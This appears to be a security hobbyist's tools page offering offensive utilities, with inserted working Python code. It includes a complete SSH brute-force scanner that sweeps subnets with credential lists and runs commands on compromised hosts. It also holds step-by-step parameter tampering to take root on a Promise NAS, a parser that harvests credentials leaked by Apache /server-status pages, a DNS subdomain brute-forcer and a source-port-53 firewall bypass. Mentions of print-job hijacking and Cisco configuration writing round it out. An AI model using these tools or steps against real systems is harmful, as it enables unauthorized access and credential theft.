
Python SSH [brute force] scanner (v1.0 Oct 2015)
Because there's always room for one more SSH brute force scanner. This one scans single hosts, lists of hosts or whole subnets, tries one or many username/password combinations against each, and runs a command of your choice on every host where a login succeeds.

To scan a single host on port 1022 with the username 'foo' and the password 'bar', give up on a connection after 1 second, and run 'id' on the host if the login succeeds, do:
  ./pysshscan.py --host 192.168.0.64 --user foo --pass bar --command 'id' --port 1022 --timeout 1
To scan a single subnet with a file full of usernames and a file full of passwords, do:
  ./pysshscan.py --host 192.168.0.0/16 --ufile usernames.txt --pfile passwords.txt --command 'id' --timeout 1
To scan multiple targets, use a file full of subnets and hosts, like so:
  ./pysshscan.py --hfile targets.txt --user test --pass test --command 'w'
Download pysshscan.py today! (It requires the Python paramiko and netaddr libraries to work -- both are easy to install).
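As an added example (this is not pysshscan.py itself), here is the target and credential expansion a scanner of this kind needs, plus a single login attempt. It uses the standard-library ipaddress module in place of netaddr, and imports paramiko inside try_login() so the expansion helpers run without it. The function names, the host-list format (blank lines and '#' comments skipped) and the stop-on-first-success behaviour are my choices, not necessarily the tool's.

```python
"""Added example: target and credential expansion for an SSH password
scanner in the style of pysshscan.py. Not the tool's own code: ipaddress
stands in for netaddr, and paramiko is imported lazily so everything
except try_login() runs without it."""
import ipaddress
import itertools
import socket
from typing import Iterable, Iterator, List, Optional, Tuple


def expand_target(spec: str) -> Iterator[str]:
    """Yield addresses for one target spec: a bare IP, a CIDR block or a
    hostname (yielded as-is). Blank lines and '#' comments are skipped so
    the lines of a targets file can be fed straight in. CIDR blocks skip
    the network and broadcast addresses, like netaddr's iter_hosts()."""
    spec = spec.strip()
    if not spec or spec.startswith("#"):
        return
    try:
        net = ipaddress.ip_network(spec, strict=False)
    except ValueError:
        yield spec  # not an address: treat as a hostname
        return
    # /31 and /32 have no separate network/broadcast; yield them literally
    addrs = net if net.num_addresses <= 2 else net.hosts()
    for addr in addrs:
        yield str(addr)


def load_targets(specs: Iterable[str]) -> List[str]:
    """Expand every spec, dropping duplicates but keeping order."""
    seen, out = set(), []
    for spec in specs:
        for host in expand_target(spec):
            if host not in seen:
                seen.add(host)
                out.append(host)
    return out


def credential_pairs(users: Iterable[str], passwords: Iterable[str]) -> List[Tuple[str, str]]:
    """Every (user, password) combination; users are the outer loop so one
    account is tried against the whole password list before the next."""
    return list(itertools.product(users, passwords))


def try_login(host: str, port: int, user: str, password: str,
              command: Optional[str] = None, timeout: float = 1.0) -> Tuple[bool, Optional[str]]:
    """One SSH password login attempt. Returns (ok, command_output).
    An authentication failure is (False, None); a network error is
    (False, 'error: ...') so the caller can tell the two apart."""
    import paramiko  # third-party; imported here on purpose (see module docstring)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=user, password=password,
                       timeout=timeout, banner_timeout=timeout, auth_timeout=timeout,
                       allow_agent=False, look_for_keys=False)
    except paramiko.AuthenticationException:
        return False, None
    except (paramiko.SSHException, socket.error) as exc:
        return False, f"error: {exc}"
    try:
        if not command:
            return True, ""
        _stdin, stdout, _stderr = client.exec_command(command, timeout=timeout)
        return True, stdout.read().decode(errors="replace")
    finally:
        client.close()


def scan(targets, users, passwords, port=22, command=None, timeout=1.0):
    """Try every credential pair against every host. A host is abandoned on
    the first network error (probably nothing listening) and on the first
    successful login; both are my choices, not necessarily the tool's."""
    hits = []
    for host in targets:
        for user, pw in credential_pairs(users, passwords):
            ok, out = try_login(host, port, user, pw, command, timeout)
            if ok:
                hits.append((host, user, pw, out))
                break
            if out is not None:  # network-level error, not a wrong password
                break
    return hits
```

The --hfile form of the tool corresponds to load_targets(open("targets.txt")), and --ufile/--pfile to reading the two wordlists into credential_pairs(). Keep the timeout short: a /16 with a few thousand credential pairs is a very long run even at one second per failed connect.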
Read/Write Cisco configuration via SNMP (v1.0 Apr 2013)
I wrote a couple of KSH scripts to read and write Cisco running-configuration using SNMP if you know the RW community.
  ./getconfig.sh private 10.10.10.1 192.168.16.1 
The above copies the running-configuration of the router at 10.10.10.1 to the file 10.10.10.1-config on the TFTP server at 192.168.16.1 (the router, not your workstation, has to be able to reach that TFTP server), and:
  ./putconfig.sh private 10.10.10.1 192.168.16.1 modified-config 
which fetches 'modified-config' from the TFTP server at 192.168.16.1 and writes it to the running configuration of the router at 10.10.10.1. Note that copying into running-config merges with what is already there rather than replacing it, so anything you want removed needs an explicit 'no' statement in the file. The two scripts are getconfig.sh and putconfig.sh and should be self-explanatory.
Apache "/server-status" scanner (v1.0 Oct 2012)
An old issue resurfaced in the news recently: many Apache servers expose their /server-status page to the world, and it lists the client address and full request line of every worker. Login forms submitted with GET are particularly exposed, since the credentials sit in the query string shown on that page. This Ruby tool takes either a domain name as input or none at all (in which case it tries some likely candidates).

For example, try:
   ./grabstatus.rb example.com | egrep -i '(=>|GET)'
More examples in the code. Find it here. Please note that you need rubygems and the sanitize gem to make it work.
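As an added example (not grabstatus.rb), here is the parsing the egrep pipeline above approximates, done properly: read the worker table of a /server-status page and flag GET requests whose query string carries credential-looking parameter names. The column handling is header-driven, so it does not matter whether the server emits the newer Protocol or Dur columns. SAMPLE_STATUS is a constructed page, and the SENSITIVE_PARAMS list is my own.

```python
"""Added example: parse an Apache /server-status worker table and flag
requests that leak credential-looking parameters in the URL. Not the
page's own tool; SAMPLE_STATUS is a constructed page for offline use."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# parameter names that should never travel in a URL (my list; extend as needed)
SENSITIVE_PARAMS = {"user", "username", "login", "email", "pass", "passwd",
                    "password", "pwd", "pin", "token", "session", "sessionid",
                    "phpsessid", "jsessionid", "key", "apikey", "otp"}


class StatusTableParser(HTMLParser):
    """Collect the header and rows of the table that has a 'Request' column."""

    def __init__(self):
        super().__init__()
        self.table = None              # (headers, rows) once found
        self._headers, self._rows = [], []
        self._row = self._cell = None
        self._is_header = False

    def handle_starttag(self, tag, attrs):
        if tag == "table":
            self._headers, self._rows = [], []
        elif tag == "tr":
            self._row = []
        elif tag in ("td", "th") and self._row is not None:
            self._cell, self._is_header = [], tag == "th"

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)

    def handle_endtag(self, tag):
        if tag in ("td", "th") and self._cell is not None:
            text = " ".join("".join(self._cell).split())   # collapse Apache's stray newlines
            (self._headers if self._is_header else self._row).append(text)
            self._cell = None
        elif tag == "tr" and self._row is not None:
            if self._row:
                self._rows.append(self._row)
            self._row = None
        elif tag == "table" and self.table is None and "Request" in self._headers:
            self.table = (self._headers, self._rows)


def parse_server_status(html):
    """Return one dict per worker row: client, vhost, method, path."""
    p = StatusTableParser()
    p.feed(html)
    p.close()
    if p.table is None:
        return []
    headers, rows = p.table
    col = {name: i for i, name in enumerate(headers)}
    entries = []
    for row in rows:
        if len(row) != len(headers):
            continue
        parts = row[col["Request"]].split(" ", 2)   # "GET /path HTTP/1.1"
        if len(parts) < 2:
            continue
        entries.append({"client": row[col["Client"]] if "Client" in col else "",
                        "vhost": row[col["VHost"]] if "VHost" in col else "",
                        "method": parts[0], "path": parts[1]})
    return entries


def sensitive_requests(entries):
    """GET requests whose query string names a sensitive parameter."""
    hits = []
    for e in entries:
        if e["method"] != "GET":
            continue
        params = parse_qs(urlsplit(e["path"]).query, keep_blank_values=True)
        leaked = sorted(k for k in params if k.lower() in SENSITIVE_PARAMS)
        if leaked:
            hits.append((e["client"], e["vhost"], e["path"], leaked))
    return hits


# constructed sample in the shape Apache emits (ExtendedStatus On)
SAMPLE_STATUS = """<html><body><h1>Apache Server Status for www.example.com</h1>
<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU
</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td><b>0-0</b></td><td>4117</td><td>0/14/14</td><td>_
</td><td>0.02</td><td>3</td><td>1</td><td>0.0</td><td>0.01</td><td>0.01</td><td>198.51.100.7</td><td>www.example.com</td><td nowrap>GET /login.php?username=alice&password=hunter2 HTTP/1.1</td></tr>
<tr><td><b>0-1</b></td><td>4118</td><td>1/3/3</td><td>W
</td><td>0.01</td><td>0</td><td>0</td><td>0.3</td><td>0.00</td><td>0.00</td><td>203.0.113.9</td><td>www.example.com</td><td nowrap>GET /server-status HTTP/1.1</td></tr>
<tr><td><b>1-0</b></td><td>4119</td><td>0/9/9</td><td>_
</td><td>0.00</td><td>12</td><td>2</td><td>0.0</td><td>0.00</td><td>0.00</td><td>192.0.2.44</td><td>www.example.com</td><td nowrap>POST /login.php HTTP/1.1</td></tr>
</table></body></html>"""

if __name__ == "__main__":
    for client, vhost, path, leaked in sensitive_requests(parse_server_status(SAMPLE_STATUS)):
        print(f"{client} -> {vhost}{path}  leaks: {', '.join(leaked)}")
```

Feed it the body of a real http://host/server-status fetch instead of SAMPLE_STATUS to use it in anger. The POST row is deliberately ignored: the status page shows only the request line, so a POSTed password never appears there, which is exactly why GET login forms are the ones to worry about.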
A Perl proxy mapper (v0.2 29 Nov 2011)
Found an open (reverse) proxy? Keen to see what it's able to connect to? Don't want to do it by hand? The Perl tool, proxymap.pl, takes the following arguments:
$ ./proxymap.pl -h
proxymap.pl v0.2 (c) 2011 th@bogus.net
usage: proxymap.pl [-h|-s|-b] [-p <port>] [-ph <proxy>] [-pp <proxy>] [-m <timeout>]] -t <target>
-h : this
-b : print returned response body on success
-t : targets to test for (range support in last octet: e.g. 192.168.0.1-255)
-p : target port(s) (default: 80)
-ph : proxy to use (default: 193.214.208.185)
-pp : proxy port to use (default: 8080)
-m : timeout (seconds) before giving up, default: 5
-s : probe scan (map permitted ports in proxy)
Please note that the default proxy won't work for you. Sorry.
Simple Perl TCP port scanner (21 Oct 2011)
Sometimes, nmap just can't be used, but Perl can! Scan TCP ports with this little tool.
SIPping.pl - A quick application level "ping" for SIP (v1.0, Jan 2011)
This little Perl utility checks the availability of a SIP server by sending a bogus REGISTER request and observing the response. It is called sipping.pl.
Backup - A configurable Perl wrapper for 'rsync' (v1.9, Jun 2010)
A friend needed a quick and easy way to make backups using 'rsync'; new in 1.8 is support for testing that a file exists in the destination directory before trying to execute the backup. Helpful if the backup destination exists on e.g. NFS or SMB shares. Find the README here. Find the Perl utility here. If you want incremental backups, this tool is not for you.
Modifying the Linksys WRT54GL to accept power via Ethernet (Sep 2009)
Two sites provided some useful information on this subject. Here is a note to self.
VirtualBox and problematic VMWare XP images (Apr 2009)
I had a small issue trying to get a Windows XP .vmdk image to boot in VirtualBox. If you get a BSOD on boot, you might want to read the STOP 7B ERROR notes on how to recover from this problem. Note: You need to obtain a copy of ERD Commander, Hirens Boot CD or similar boot media.
Stripping headers off Nortel RTP streams (Oct 2008)
nortel-rtp-stripper.pl is a little Perl hack that strips the RTP headers off Nortel voice streams so they can be imported into Audacity as A-Law, 8000Hz without the annoying "buzzing" you get (if imported directly from Wireshark). Useful if you have obtained voice intercepts on a Nortel VoIP network. (Keywords: UDP port 5200, RUDP, RTP)
Directory management with Prunedir (v1.10 Mar 2008)
This little Perl snippet will prune your directories (e.g. say you want to only have 10 directory entries in a directory and remove the oldest first). Use with care. I'll write a README later, in the meantime, do:

   prunedir.pl -h

This will give you some very basic help. It's probably not the most elegant way of pruning directories (especially as we're calling ls externally rather than using opendir()), but this was a quick hack for a friend who kept asking for more options!

NOTE: If you don't wish to prune certain directories, edit the @IGNORE array within the source code.
Changing the 'root' password on a Promise NAS NS4300N (Sep 2007)
Ok, forget the "admin access" hack below. Enabling 'root' access directly is a far easier task and only requires a web browser and an intercepting proxy of some kind (Paros, Burp, take your pick). Log in with the 'admin' account and go to the "User Management" -> "Change Password" form. Select any user and enter the password of your choice. Intercept the POST request to /usercp.php and change the value of the 'user' parameter to 'root'. That's it: root's password is now one you know, and the account has telnet access enabled. Log in to the NAS directly by telnet'ing to port 2380/tcp. NOTE: My NS4300N is running firmware version 1.1.0.5; this may not work on later versions (let me know though!). You may want to try http://mike.makuch.org/?p=89 if you have a newer firmware.
Brute-DNS, the host guesser (v1.4, Sep 2007)
I resurrected an old tool. The new version will test a bunch of different words and derivatives (e.g. "wwwa", "www-a", "www-01" and so forth). The Perl code still calls the Unix 'host' command though, which is pretty lame, but it works quite well. It still allows the use of wordlists, but not from STDIN. Try "-h" for help. Find it here.
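As an added example (not brute-dns itself), here is the candidate generation described above together with the one check a host guesser cannot do without: a wildcard test, so that a zone which answers for every name does not turn every guess into a "hit". It uses the system resolver through socket.gethostbyname() rather than shelling out to 'host'; the numeric derivatives (www1, www-1, www01, www-01) are my extension of the lettered ones the text names, and the resolver is injectable so the logic can be exercised offline.

```python
"""Added example: candidate generation plus wildcard detection for a DNS
host guesser in the spirit of brute-dns. Not the tool's own code."""
import random
import socket
import string
from typing import Callable, Dict, Iterable, List, Optional


def derivatives(word: str, max_num: int = 20, pad: int = 2) -> List[str]:
    """'www' -> www, wwwa, www-a, ..., www1, www-1, www01, www-01, ...
    (the numeric forms are my addition to the lettered ones the text names)."""
    cands = [word]
    for c in string.ascii_lowercase:
        cands += [f"{word}{c}", f"{word}-{c}"]
    for n in range(1, max_num + 1):
        cands += [f"{word}{n}", f"{word}-{n}", f"{word}{n:0{pad}d}", f"{word}-{n:0{pad}d}"]
    seen, out = set(), []
    for c in cands:            # padded and unpadded forms coincide once n >= 10
        if c not in seen:
            seen.add(c)
            out.append(c)
    return out


def resolve(name: str) -> Optional[str]:
    """A-record lookup via the system resolver; None when the name does not exist."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def wildcard_address(domain: str, resolver: Callable[[str], Optional[str]]) -> Optional[str]:
    """Resolve a random label under the domain. If that answers, the zone has
    a wildcard and every guess will appear to exist; the address it returns is
    then used to discard those false positives."""
    label = "".join(random.choices(string.ascii_lowercase + string.digits, k=14))
    return resolver(f"{label}.{domain}")


def brute(domain: str, words: Iterable[str],
          resolver: Callable[[str], Optional[str]] = resolve) -> Dict[str, str]:
    """Try every derivative of every word under domain; return name -> address
    for the ones that resolve to something other than the wildcard answer."""
    wild = wildcard_address(domain, resolver)
    found: Dict[str, str] = {}
    for word in words:
        word = word.strip()
        if not word or word.startswith("#"):
            continue
        for label in derivatives(word):
            fqdn = f"{label}.{domain}"
            addr = resolver(fqdn)
            if addr is not None and addr != wild:
                found[fqdn] = addr
    return found


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"
    words = sys.argv[2:] or ["www", "mail", "ns", "dev", "vpn"]
    for name, addr in sorted(brute(target, words).items()):
        print(f"{name} {addr}")
```

The wildcard check only catches zones that return one fixed address; a wildcard that hands out several addresses (round-robin) will still leak through, which is worth remembering when a run returns suspiciously many hits.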
Enabling 'admin' access on a Promise NAS NS4300N (Aug 2007)
So, I got myself a Promise SmartStor NS4300N, but didn't have much luck with the squashfs filesystem. Luckily Google came to the rescue and someone named "rosvall" posted an excellent solution! Thanks! You can find it here. In case that place disappears, I wrote a README. I also provide the binary I used to enable the login here.
HP JetDirect Print Job Hijacker (v1.2, 2006)
This tool has been lying around in files/ since 2006. The 9k1-hijacker.pl tool is useful if you have access to a printer's configuration (usually unpassworded), or if you are able to spoof the printer's IP address (ARP poisoning). Basically, it is used to man-in-the-middle (MITM) print jobs -- it allows you to steal print jobs transparently (it makes a local copy before forwarding it to the printer).
Realitis PBX Brute Force OSL Guessing Tool (v1.0, 2006)
This tool will try to brute force the Open System Lock (OSL) on PBXs that run the Siemens Realitis software. The README describes its use as well as requirements, and also gives you a few hints on where to look for information leakage should you come across one of these on your travels.
OpenVPN DNS resolver updater - resolvfix.pl (v0.01, 2006)
A tool for *nix users of OpenVPN. It updates the DNS resolver configuration depending on whether you start or stop the OpenVPN process. Essentially, drop the Perl script in /usr/local/bin and add the following lines to your config.ovpn file:
   up /usr/local/bin/resolvfix.pl
   down /usr/local/bin/resolvfix.pl
OpenBSD patch for RainbowCrack v1.2 (11 May 2004)
In 2004, RainbowCrack didn't work on OpenBSD, so I wrote a patch.
SFVDir (v1.8, 24 Jul 2003)
SFV (Simple File Verification) files hold CRC32 checksums for a set of files, and an SFV checker verifies files against them. A friend wanted something that could run the check recursively over a directory tree, so I wrote a Perl wrapper for it. To use the wrapper, you'll need an SFV tool itself (pdsfv is known to work).
CA AMO Unicenter Password Recovery Tool (v1.2, 19 Feb 2003)
I doubt anyone uses this asset management software anymore, but this is a tool I wrote that will recover the encrypted passwords (yay!).
OpenSSL v0.9.6l and OpenVPN v1.5 for Familiar Linux (Feb 2002)
I needed these ARM binaries for my Linux iPaq, so I built them and thought others might want them too. There could be ipkg's for these things now, so check that first before you use these old ones!
Cisco Configuration Grabber (2002)
This tool automates exploitation of the HTTP authentication bypass bug in old Cisco IOS releases. For more information about the bug, check http://www.securiteam.com/securitynews/5PP0L2K4KY.html.
Quotenotifier (v0.17, Aug 2001)
A piece of Perl that will display stock quotes on your HP printer (among other things).
CryptoCard(tm) Challenge/Response Authentication Patch for Bash (v1.0, 7 Apr 2001)
I wrote this patch for Bourne Again Shell (Bash) v2.04 for someone who was using it as a login shell. There's a README and also some supporting documentation (thanks, Simon!) and a key generation tool for card management. It's a straightforward patch and shouldn't be too hard to port to newer versions if you need to. (It only asks for a challenge when Bash is run as a login shell.)
Beale Ciphers (Oct 1999)
I was on a plane reading about Beale ciphers, so I wrote some Perl to help solve them (haha!) or make your own! Great fun.
BIND Version Query Tool (29 Sep 1999)
This is a patched version of bindinfo.c by Joshua James Drake. All the patch does is set the UDP source port to 53; I needed that one day to get through a poorly configured packet filter that let anything with source port 53 straight in. These days, use 'nmap -g53' with your service scan options set, or simply: dig @server version.bind chaos txt
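As an added example (not bindinfo.c or the patch), the same query built by hand: a CHAOS-class TXT query for version.bind, a parser for the answer that follows name-compression pointers, and a sender that binds UDP source port 53 the way the patch does. build_version_response() constructs a sample answer so the parser can be exercised offline; the function names are my own.

```python
"""Added example: version.bind CH TXT query from source port 53, built
with raw struct packing. Not the page's bindinfo.c; build_version_response()
fabricates an answer purely so the parser can be tested without a server."""
import random
import socket
import struct

TYPE_TXT, CLASS_CH = 16, 3


def encode_name(name: str) -> bytes:
    """'version.bind' -> b'\\x07version\\x04bind\\x00' (uncompressed wire form)."""
    out = b""
    for label in name.strip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_version_query(txid=None) -> bytes:
    """12-byte header (flags 0: no recursion wanted), one question."""
    if txid is None:
        txid = random.randrange(0x10000)
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("version.bind") + struct.pack(">HH", TYPE_TXT, CLASS_CH)


def decode_name(pkt: bytes, off: int):
    """Return (name, offset_after_name), following 0xC0xx compression pointers."""
    labels, jumped, end = [], False, off
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:                       # pointer to an earlier name
            ptr = struct.unpack(">H", pkt[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2
            off, jumped = ptr, True
            continue
        if ln == 0:
            if not jumped:
                end = off + 1
            break
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii", "replace"))
        off += 1 + ln
    return ".".join(labels), end


def parse_txt_answer(pkt: bytes) -> dict:
    """Pull the TXT strings out of a version.bind answer."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):                             # skip the echoed question
        _, off = decode_name(pkt, off)
        off += 4
    strings = []
    for _ in range(an):
        name, off = decode_name(pkt, off)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata, off = pkt[off:off + rdlen], off + rdlen
        if rtype == TYPE_TXT and rclass == CLASS_CH and name.lower() == "version.bind":
            i = 0
            while i < len(rdata):                   # TXT rdata: length-prefixed strings
                n = rdata[i]
                strings.append(rdata[i + 1:i + 1 + n].decode("ascii", "replace"))
                i += 1 + n
    return {"txid": txid, "rcode": flags & 0xF, "version": strings}


def build_version_response(txid: int, text: str) -> bytes:
    """Constructed sample answer (QR+AA set, one TXT record) for offline tests."""
    question = build_version_query(txid)[12:]
    header = struct.pack(">HHHHHH", txid, 0x8400, 1, 1, 0, 0)
    rdata = bytes([len(text)]) + text.encode("ascii")
    answer = b"\xc0\x0c" + struct.pack(">HHIH", TYPE_TXT, CLASS_CH, 0, len(rdata)) + rdata
    return header + question + answer


def query_version(server: str, source_port: int = 53, timeout: float = 3.0) -> dict:
    """Send the query from UDP source port 53 (needs root) like the patched bindinfo."""
    txid = random.randrange(0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.bind(("", source_port))
    try:
        sock.sendto(build_version_query(txid), (server, 53))
        data, _ = sock.recvfrom(512)
    finally:
        sock.close()
    result = parse_txt_answer(data)
    if result["txid"] != txid:
        raise ValueError("transaction id mismatch; not our answer")
    return result


if __name__ == "__main__":
    import sys
    print(query_version(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"))
```

Many resolvers now answer version.bind with a fake string or REFUSED (rcode 5), so an empty "version" list with a non-zero rcode is the normal outcome on a hardened server, not a parsing failure.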